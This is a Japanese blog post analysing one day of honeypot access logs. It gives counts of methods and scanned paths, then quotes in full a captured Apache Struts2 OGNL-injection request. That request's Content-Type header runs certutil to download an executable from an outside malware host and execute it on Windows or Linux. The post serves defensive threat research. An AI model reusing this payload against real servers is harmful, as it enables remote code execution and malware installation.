honeypotの簡易解析9日目 |

WOWHoneypotのaccess_logよりcsvを生成するスクリプトを作成しました。

今まで一通りlogを舐めてましたが、気になったものしか見なさそうです。

2019-04-09のアクセス数は62件でした。

■送信元IPアドレスの数は 47件です。

■メソッドの一覧と件数は以下です。

method	総数 – method
CONNECT	1
GET	60
POST	1
合計結果	62

■アクセスパス一覧と件数は以下です。

path	method	総数 – path
/	GET	39
/.well-known/security.txt	GET	1
//ldskflks	GET	1
/cms//?author=1	GET	1
/cms//wp-json/wp/v2/users/	GET	1
/cms/wp-login.php	GET	1
/cms1//?author=1	GET	1
/cms1//wp-json/wp/v2/users/	GET	1
/cms1/wp-login.php	GET	1
/favicon.ico	GET	3
/index.action	GET	1
/index.do	GET	1
/manager/html	GET	4
/robots.txt	GET	1
/sitemap.xml	GET	1
/struts2-rest-showcase/orders.xhtml	GET	1
/tmUnblock.cgi	POST	1
/version	GET	1
api.ipify.org:443	CONNECT	1

気になるlog

51〜53件目。struts2の脆弱性を突き、http[:]//fid.hognoob.se/download[.]exeをダウンロード。

[2019-04-09 19:13:49+0900] 121.28.9.7 ほげ:80 "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 200 FalseGET /struts2-rest-showcase/orders.xhtml HTTP/1.1
Connection: Keep-Alive
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/hzzwihsvgsdbmlk23163.exe & cmd.exe /c C:/Windows/temp/hzzwihsvgsdbmlk23163.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/struts2-rest-showcase/orders.xhtml
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ

下の部分でwindowsかlinuxを判別しています。

(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})

以下の記事が参考になります。

https://www.morihi-soc.net/?p=654

virustotalはこちら

この前ちょっと解析したやつと同じだな。

月	火	水	木	金	土	日
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30	31